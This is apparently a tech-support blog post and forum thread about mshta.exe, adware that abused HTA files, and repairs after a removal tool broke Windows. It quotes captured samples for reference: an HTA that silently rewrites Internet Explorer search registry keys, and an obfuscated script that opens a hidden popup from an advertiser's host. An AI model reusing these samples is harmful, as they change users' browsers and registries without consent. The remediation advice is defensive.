by   May 20 2009   
MSHTA.exe Adware Problems. These were one of the best problems of the year, now gone. Short Version: If you ran any fix or adware removal that deleted your MSHTA.Exe file you might have had issues accessing your control panel.

MSHTA.exe Adware Problems.

Update: 6-1-2012, I thought the MSHTA.Exe issue was a thing of the

past. From the search index it appears some PC Cleaning software still treats this software as spyware or some are thinking it is spyware.

In any case, I bet you had issues with your control panel and a few other Windows Components that might use the old .HTA extension or some interface with HTML.

If you deleted the file here's your lesson for the day: Google Search: "mshta.exe" site:microsoft.com and read.

It's an old file but I am seeing new applications that can use this file. The problem with the file years ago was that some malware in websites would use it to install applications. You can read some of the old notes below on how it was used against PCs.

But, it also had a great application interface that one day I'll publish some examples. It allowed you to create a complete desktop in HTML code just like you see in Win8, GoogleOS, iOS and that iPhone thing. It's old school and doesn't often come up but hta coding is part of IIS servers as well. (Win7 2008 mshta.exe) and if you're running Win7 Pro with IIS enabled be sure to remove the .hta extensions if you aren't using the mshta.exe interfaces.

In any case, if you installed some application that ended up telling you MSHTA.Exe was a virus or a bad applications would you send me a service desk ticket with the name of the software. I really enjoy reviewing software that breaks operating systems.

I'll extract Win7 Pro, Home, Starter, and Win8 MSHTA.Eve files later this week, my guess the version I have from my ultimate will be just fine but not so sure with Win7 Home and Starter. So if you try it and it works then great, what do you have to lose, it's broken, missing or corrupted now.

Tell me how it goes so I can update this post and spotlight your name if you would like as the "Test Systems Expert" aka "Guinea pig". (humor)

For now here's the list and if you are successful at the download great. If it's blocked then send me a service desk note and I'll put them up in the knowledge base which doesn't have as many restricts. (I think)

Disclaimer: This is a file associated within the Windows Operating System32 folder. You download and use it at your own risk. I've had these files online for years (1999) to help people correct problems after some software applications deleted the file. Part of the License agreement forbids distribution of software but updating or replacing a corrupted component file is Ok. That's from the last reading of the OEM agreement, if I'm wrong I'll remove these files but I think it's still ok.

Again, these are from my service disk and I have used them to correct system problems on systems I have worked with but I do not make any warrantees about what you do with them.

DOWNLOAD PROBLEMS? If you have any problems downloading the files from the links below try using a different browser. If you are still not able to download the files, try downloading them from the service portal.xtremecomputer.com here's the link.

  • Windows 7 Ultimate Missing or Corrupted MSHTA.Exe file.
    • mshta.exe download
    • (right click, save target as or save link as, then AV scan it as always)
    • Tell me if this works on your Home, Starter Win7 versions. If not, I'll pull my disks and extract the mshta.exe files for each version. My guess it will work on all Win7 and 2008 versions.
  • Windows XP Pro Missing or Corrupted MSHTA.Exe File
  • Windows XP Home Edition Missing or Corrupted MSHTA.Exe file
  • Windows ME Missing or Corrupted MSHTA.Exe file
  • Windows 2000 Pro Missing or Corrupted MSHTA.Exe file
  • Windows 98 Second Edition Missing or Corrupted MSHTA.Exe file
    • mshta.exe download
    • (yes, right click, save target as or save link as, then AV scan it as always)

(I know, if you ask for Windows 95 I'll get that off my OEM disk as well but the 95isalive group hasn't been by any of my sites for over 10 years now.)

Short Version: If you ran any fix or adware removal that deleted your MSHTA.Exe file you might have had issues accessing your control panel.

Before you delete, change or run a fix for MSHTA.exe please Read the warnings. Windows 2000 users will have MMC problems and can be seen by testing your Add/Remove Programs from Control panel.

Just had my firewall report a connection to server276.passthison.com Port 80 had a connection attempt from the windows application,
mshta.exe on Windows 2000.

Posted - 07/16/2009

BELOW ARE EXAMPLES ONLY FOR YOUR READING!!!!!

These are from my early "Capture Bad Marketing" advertiser days.

The examples were at one time major issues to every IE user and Windows user. You can see it in the code lines, these old malware hacks used exploits before exploits were popular or a buzz word. 

Is this spyware or adware?

What is mshta.exe and why is it trying to connect?

While I was looking for this answer a Pop-up appeared but didn't load from address http:## //object.passthison.com/vu083003/object-no-hp.cgi?033 Not a good sign when my system tries to connect to a website I don't want it connecting to.

For now I just placed a block on outbound connections for file mshta.exe and will check on it to see just what it does.


--------------------------------------------------------------------------------

Here is the code from within the .hta file. You are not going to like it at all. If you came to this site because of the web address we will be looking for a playback with them.
Looks like they are installing a search bar other than what you have as default.


This is the path of the software. Basically this exploit used MSHTA.exe to modify your registry

------------------- Don't use this code for anything more than just a reference. --------------------------------------------------

html

object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' object
script
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "http:## //server224.smartbotpro.net/7search/?hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "http:## //server224.smartbotpro.net/7search/?hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
/script
/html

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Here is the Source Code showing the affiliate.


quote:
--------------------------------------------------------------------------------

centeR

7Search.com Small Search Box Code START --
FORM NAME="7search_small_box" ACTION="http:## //7search.com/scripts/search.asp" METHOD="GET" TARGET="_blank"
SCRIPT LANGUAGE="JavaScript" SRC="http:## //img.7search.com/images/boxsmall.js"></SCRIPT>
<IMG SRC="http:## //impression.7search.com/scripts/impression.asp?affiliate=61429" BORDER="0" WIDTH="1" HEIGHT="1">
<INPUT TYPE="hidden" NAME="Language" VALUE="1">
<INPUT TYPE="hidden" NAME="Affiliate" VALUE="61429">
</FORM>
<!-- 7Search.com Small Search Box Code END -->
</center>

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b \u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030\u0030\u0033\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002d\u0063\u0030\u0030\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>


--------------------------------------------------------------------------------


Looks like this:

(I will find the screenshot of the above soon enough. 

--------------------------------------------------------------------------------


Yes if you had the hta file start you will find a new search in your Internet Explorer Browser Bar as shown in the picture.

Remember the Affiliate number affiliate=61429.
This person modified your computers registry without asking permission to install or edit anything.

If you follow ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no"); and find Use Search Asst this is a clear indication that the hta file browsed has installed a modification to your registry.

The Fix is just to remove registry entry and remove hta file extension. Read below.


--------------------------------------------------------------------------------


Admin note IF YOU ARE HERE LOOKING FOR THE ANSWER TO THE FILE EXTENSION .HTA WHICH USES THE C:\WINDOWS\SYSTEM32\MSHTA.EXE "%1"% TO LAUNCH WEB BASED BROWSERS THAT DO CONNECT TO LOCAL PROGRAMS AND CAN LAUNCH ANY PROGRAM THAT IS ON YOUR COMPUTER INCLUDING INSTALLATION OF PROGRAMS. READ FIRST BEFORE DOING ANYTHING WITH YOUR MSHTA.EXE FILE


Test to see if you even need to read more:
The following link should not automatically start. It should be asking you to download the file. Cancel the download for now. Test Link: http://www.jasons-toolbox.com/OpenPorts/OpenPorts.hta

Admin notes: After testing with other systems we found that by replacing the mshta.exe file with notepad you will have different problems. Even changing the application association to notepad is not a good method.
THIS IS NOT THE FIX YOU NEED FOR WINDOWS 2000 OR XP STOP HERE.

Other fixes of creating a new reference would be safer. Examples of out to create a file association or change the association are below replacing the NSClean post.

As recommened by NSClean the program HTAStop will not work and is not supported on newer operating systems such as Windows 2000 and XP. We are removing reference to this software link and would like users to read carefully fixes and ask if the fix has been tested on systems. This was not a fix tested by us but only referenced from other sites based on the posts below. Again DO NOT use if you have Windows 2000 or XP. We will create a work around to this problem and test it before posting.
We are running tests on the listed programs 98/ME to see if it would apply which it seems to be developed for.
If you have run the HTA block you have changed your mshta.exe program to notepad but with the name of the program the same (mshta.exe).
This will not allow you to open Add/Remove Programs from Control Panel and other programs within your Microsoft Operating system.
If you have run this program that is talked about here you need to copy the file mshta.exe from your Software CD. We have placed a download of the file for Windows 2000 and XP online if you can not locate your licensed disk.


--------------------------------------------------------------------------------

ADMIN NOTE: READ OPERATING SYSTEM REQUIREMENTS WE WILL CORRECT THIS POST IT IS NOT COMPLETELY SAFE BY THE MEANS SUGGESTED. BUT WE DO HAVE A FIX TO WHAT WAS BROKE....

--------------------------------------------------------------------------------

The system tested did not have a file association with HTA file extensions. Trying to repeat the issue has not been successful.


--------------------------------------------------------------------------------

What we do recommend for now is to remove the HTA extension path. This can be added back with the same amount of time and effort it takes to remove it.


--------------------------------------------------------------------------------

Removal of HTA Path to mshta.exe:

1. Open Explorer (Right mouse click on START left click EXPLORER)

2. On the top Menu click on "Tools" (The menu line where you find File, Edit, View, Favorites, Tools, Help)

3. Then click "Folder Options"

4. Then Click on Tab "File Types"

5. Scroll down until you see in the Extensions Column the letters HTA.

6. Highlite it by clicking one time on it.

7. Delete it.


--------------------------------------------------------------------------------

To add the extension back:

1. Follow the steps above 1 thru 4.
2. Click on "NEW"
3. For "File Extension" type HTA then click OK.
4. Find the Extension HTA and highlite it by clicking once on it.
5. Click "Advanced" near the bottom of this screen. Actions box should be empty and the default Icon will say something like FT000001 and show nothing.
6. Change the junk word FT000001 to HTML Application.
7. Click on "Change Icon" (if you don't see the wordpad icon select it)
8. In the Actions Box, click New.
9. In New Action Dialog Box under Action type "Open". (No quotes)
10. For "Application used to perform action: type the following if your System32 file is on the C drive.

C:\WINNT\System32\mshta.exe"%1"%

If your system32 folder is under a different folder just change the name.

11. Click "OK"
12. Place a check mark in "Confirm open after download"

You've added it back now follow the link above and test it by openning the portopen scan.

If you have any questions about this very confusing topic please feel free to contact us via a post here.


--------------------------------------------------------------------------------


Here's the directory where you might find mshta.exe

 


NOTES:
We are seeing allot of different types of delivery systems being developed and exploited.

From the mshta.exe which we are seeing online advertisements include the scripts within mouse over banners.

Three items I would like you all to look into.

1. Email Spammers that are running programs or setting up systems to change IP addresses on each attempt. Is this a multi-point spam slam or is it a single workstation running some type of program that changes the IP at each send command line?

2. The HTA and Global.asa with mshta.exe. Is this the start of a new plan or type of delivery system for a virus attack?

3. UDP port attack possibility. Have any of you tested the above deliver systems with UDP ?

Post replies under the sections that match.

If you think this is hard you should see what I do for a hobby!

techxtreme

The filename, directory name or volume label syntax is incorrect.

So you tried to open up Add/Remove Programs and you see the message above with the application name NOTEPAD in the popups left upper corner.

Now what?

From the site Simtel at http://www.simtel.net/ they sure didn't tell you that other programs would be effected.

Here's what we read:
Description by publisher


quote:
--------------------------------------------------------------------------------
"HTAstop2003 IMPROVED!!! It's now possible for a "rogue" website to actually embed trojans, worms and/or viruses directly into a web page. In the past, pages that offer seemingly attractive downloads which contain such malware required you to click to start any download to your computer. Now it's become automatic, using features in the Windows operating system known as scripting. These scripts can load programs without you knowing, and then they run immediately. All you have to do is visit the site, without doing anything besides viewing the page. HTAstop acts as a brickwall against these scripts, disabling them so the download doesn't occur. HTAstop protects you against one variety of script, our current IEClean version covers all twenty seven. If you have completely and successfully patched your Windows operating system and have scripting disabled in your system, or are using IEClean 5.50 with scripting access turned off, you won't won't fall victim to this threat. Barring those, it's a good idea to have HTAstop on your system. You can switch access on when you want to use Net-based trusted applications, and then keep it off for general web surfing.

In the new "HTASTOP 2003" release, the entire MSTA program is removed and replaced with the NOTEPAD applet. When an HTA script is encountered, or the machine
is forced to run MSHTA by a rogue site, NOTEPAD will popup instead and display the contents of the HTA script without running it. If you wish to, or NEED to run the HTA script, then ENABLE HTA and then reload the item in question. This latter feature was added for the rare situations where your network administrator or other trusted source needs to use HTA.
"

Facts Objective Fact
Operating Systems Windows 95/98/ME
Supported languages English
System requirements No special requirements
Direct link http://www.simtel.net/pub/pd/67031.html
Services Name Description
Read User Reviews Read other users opinion.
See more by this author Search for other products created by this author.
Actions Name Description
Review Title Rate and/or write your opinion.
Notify Friends Send description and download URLs to your friends.
Print Facts Card Get a hard-copy of the details for this product.


--------------------------------------------------------------------------------


Well they didn't list 2000 or XP so our guess is we messed it up, didn't read the fine print.

So if you have done the same thing here's what you do.

If you have lost your MSHTA.EXE like we did on our test system just visit our download section we extracted the original MSHTA.EXE from disk so you can download it and fix the problem. Do this only if the above program has writen note pad over mshta.exe. Check the file sites of what we have for MSHTA.EXE to what you have. If MSHTA.exe has changed to Notepad you should see the notepad icon next to the file. Windows 2000 Pro notepad is 50K.

It's not going to hurt trying do to the fact the above program deleted the original version.

Download MSHTA.EXE file from our download section under your operating system. THIS IS ONLY A REPLACEMENT FILE!!!


BroadBands Forum just for additional reading for you so you can ask the question. What do I do? http://www.broadbandreports.com/forum/remark,8182176~mode=flat

FINAL NOTES:
If you would like to file a complaint about this type of affiliate advertising that makes modifications to your computers registry please feel free to email the company below.

Only if you have had the same thing happen to you as in the Topic of this forum. Please include the link to this topic so they can see we do not care for HTA files from Advertisers.

WHOIS whois.opensrs.net 7search.com:
IP address: 208.237.254.40
Host name: 7search.com

Registrant:
7 Search, Co
3950 N. Avondale Ave.
Chicago, IL 60641
US

Domain name: 7SEARCH.COM

Administrative Contact:
Devereaux, Patrick webadmin@7search.com
3950 N. Avondale Ave.
Chicago, IL 60641
US
800-577-1165 Fax: 773-283-0170

Technical Contact:
Larson, Baird hostmaster@7search.com
3950 N. Avondale Ave.
Chicago, IL 60641
US
800-577-1165 Fax: 773-283-0170


Registration Service Provider:
EMERgency 24 Inc., hostmaster@emergency24.com
773-725-0222
This company may be contacted for domain login/passwords,
DNS/Nameserver changes, and general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 12-Oct-2002.
Record expires on 25-May-2004.
Record Created on 25-May-1999.

Domain servers in listed order:
NS1.WATCH24.COM 208.237.254.3
NS2.EMERGENCY24.COM 208.237.254.4


--------------------------------------------------------------------------------


If you would like to go one step further.
Set your firewall to block all connections to there IP range.
Emergency 24 UU-208-237-254 (NET-208-237-254-0-1)
208.237.254.0 - 208.237.254.255

That will cut down on advertisement links for them. Be sure to CC hostmaster@emergency24.com for each mail.

Good Luck.


If you think this is hard you should see what I do for a hobby!

XtremeAdmin


USA
71 Posts Posted - December 15 2003 : 00:14:21
--------------------------------------------------------------------------------
Java related to above posts.
This will be transfered to a different section of the site and treated as Spyware Adware programs.


--------------------------------------------------------------------------------


quote:
--------------------------------------------------------------------------------

document.writeln('<TABLE BGCOLOR="#203068" BORDER="1" BORDERCOLOR="#203068" HEIGHT="15" WIDTH="100" CELLSPACING="0" CELLPADDING="0">')
document.writeln('<TR>')
document.writeln(' <TD ALIGN="middle" BGCOLOR="#203068" HEIGHT="15" WIDTH="362" BORDERCOLOR="#203068" COLSPAN="2"><A HREF="http:## //7search.com"><IMG SRC="http:## //7search.com/images/7sboxsmall.gif" BORDER=0></A></TD>')
document.writeln('</TR>')
document.writeln('<TR>')
document.writeln(' <TD ALIGN="right" BGCOLOR="#203068" HEIGHT="15" WIDTH="181" BORDERCOLOR="#203068" VAlIGN="middle"><INPUT TYPE="text" NAME="qu" SIZE="7"></TD>')
document.writeln(' <TD ALIGN="center" BGCOLOR="#203068" HEIGHT="15" WIDTH="181" BORDERCOLOR="#203068" VALIGN="middle"><INPUT TYPE=IMAGE BORDER="0" SRC="http:## //7search.com/images/search.gif" WIDTH="50" HEIGHT="16" ALT="Search"></FONT></TD>')
document.writeln('</TR>')
document.writeln('<TR>')
document.writeln(' <TD ALIGN="center" COLSPAN="2" VALIGN="TOP"><a href="http:## //### .pay-per-search.com/?xcmpx=1166"><font face="Arial" size="1" color="#FFFFFF"><b>Earn $$ With Your Site</b></font></a></TD>')
document.writeln('</TR>')
document.writeln('</TABLE>')

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------


The Pay-Per-Search info:
IP address: 208.237.254.7
Host name: pay-per-search.com

Look at the Alias:
whosbest.com
ftp.whosbest.com
www.whosbest.com
whoisbest.com
ftp.whoisbest.com
www.whoisbest.com
familyweavers.com
www.familyweavers.com
ftp.familyweavers.com
waytopeace.com
www.waytopeace.com
ftp.waytopeace.com
thewaytopeace.com
www.thewaytopeace.com
ftp.thewaytopeace.com
mattwalbruch.com
ftp.mattwalbruch.com
www.mattwalbruch.com
searchleads.com
www.searchleads.com
ftp.searchleads.com
searchengineleads.com


--------------------------------------------------------------------------------


Nice thing about it is that all the sites involved with the HTA Registry Modification Hack are on the same DNS which makes it allot easier finding the company.
WHOIS whois.opensrs.net pay-per-search.com:

Registrant:
Pay-Per-Search Co.
4179 W. Irving Park Road
Chicago, IL 60641
US

Domain name: PAY-PER-SEARCH.COM

Administrative Contact:
Devereaux, Patrick webadmin@emergency24.com
4179 W. Irving Park Road
Chicago, IL 60641
US
773-725-0222 Fax: 773-286-1992

Technical Contact:
Larson, Baird hostmaster@emergency24.com
4179 W. Irving Park Rd.
Chicago, IL 60641
US
773-725-0222 Fax: 773-286-1992


Registration Service Provider:
EMERgency 24 Inc., hostmaster@emergency24.com
773-725-0222
This company may be contacted for domain login/passwords,
DNS/Nameserver changes, and general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 21-Sep-2003.
Record expires on 18-Oct-2004.
Record Created on 18-Oct-1999.

Domain servers in listed order:
NS1.WATCH24.COM 208.237.254.3
NS2.EMERGENCY24.COM 208.237.254.4


If you think this is hard you should see what I do for a hobby!


NNNNN

Robert


1 Posts Posted - January 22 2004 : 18:41:39
--------------------------------------------------------------------------------
If you follow everything in these threads, and still find that searching from the address bar results in you being placed on a site that essentially says in big bold letters that it cannot find the URL and gives you a slimy page that has lots of links to different things, then you have this problem. What has happened is that passthison.com has hijacked and redirected your DNS by altering your HOSTS file.

Here is the fix for the redirected DNS:

Find the HOSTS file(s) on your computer and REM out the lines that redirect your DNS to passthison's IP. You will simply add a # to the beginning of each line that you wish to REM out.

Don't forget to flush your DNS! ;c)


For those that find this post that are still yearning to become super gurus, here is a I made to another list. I'm hoping that adding it here will help others even more.

...

Hi everyone,

You probably know by now that Spybot works to fix the issue. However, if you want to know how they redirect "address line" searching, or how they redirect you from complaining to Network Solutions / Verisign, here's how:

Most people's internet connections are automatically set up as if they are a part of a large network. One of the little-used network redundancies is to have a backup file on the local workstation that tells the computer where to look for the network resources. This file is called HOSTS. It certainly is almost never used in a home machine.

Unfortunately, this HOSTS file is loaded by default into your computer's DNS service. The DNS, or Domain Name Server, is how your computer knows where to initially look for your network. By default, your computer is told to look internally. However, if modified your computer can be told to look elsewhere for the DNS information. This is part of what passthison does to your computer if you choose 'yes' to the dialog box that pops up.

All you have to do to stop the hijacking of your DNS (not necessarily of your homepage) is to do a search of All Files and Folders (or similar) to find the file HOSTS. You need to ensure that you are searching the ENTIRE harddrive (C:), and not just "My Documents" or some_such. Note that the file could possibly be a 'hidden' file. When you find the file HOSTS (often there is two or more...) you want to open it using Notepad. DO NOT USE MICROSOFT WORD!!!! Put # in front of anything you find other than 127.0.0.1 and save the file. Do this for all the HOSTS files you find.

Reboot. Find the HOSTS file and see if the file is the same as when you left it. If whatever originally hijacked your computer is still active, chances are that it will again change the HOSTS file. If it is the same as you left it, feel free to go complain to however is hosting the website.

Of course, feel free to delete the HOSTS files anyway.
;c) Not that big of an issue unless you are on a network that makes use of the hosts file. In that case, contact your Network Administrator first.

If you want to find out who to complain to, check out http://www.samspade.org/
You'll find out a lot of information there, too

I'll find this image one day: (Found it!)

The HTA stop was a good idea but didn't really work. If you are planning on running any application that stops .hta file extensions be sure you don't disable some key components of your Windows operating system.

Mshta _location _site


Htastop

 

 

 

MSHTA.exe Adware Problems. These were one of the best problems of the year, now gone. Short Version: If you ran any fix or adware removal that deleted your MSHTA.Exe file you might have had issues accessing your control panel.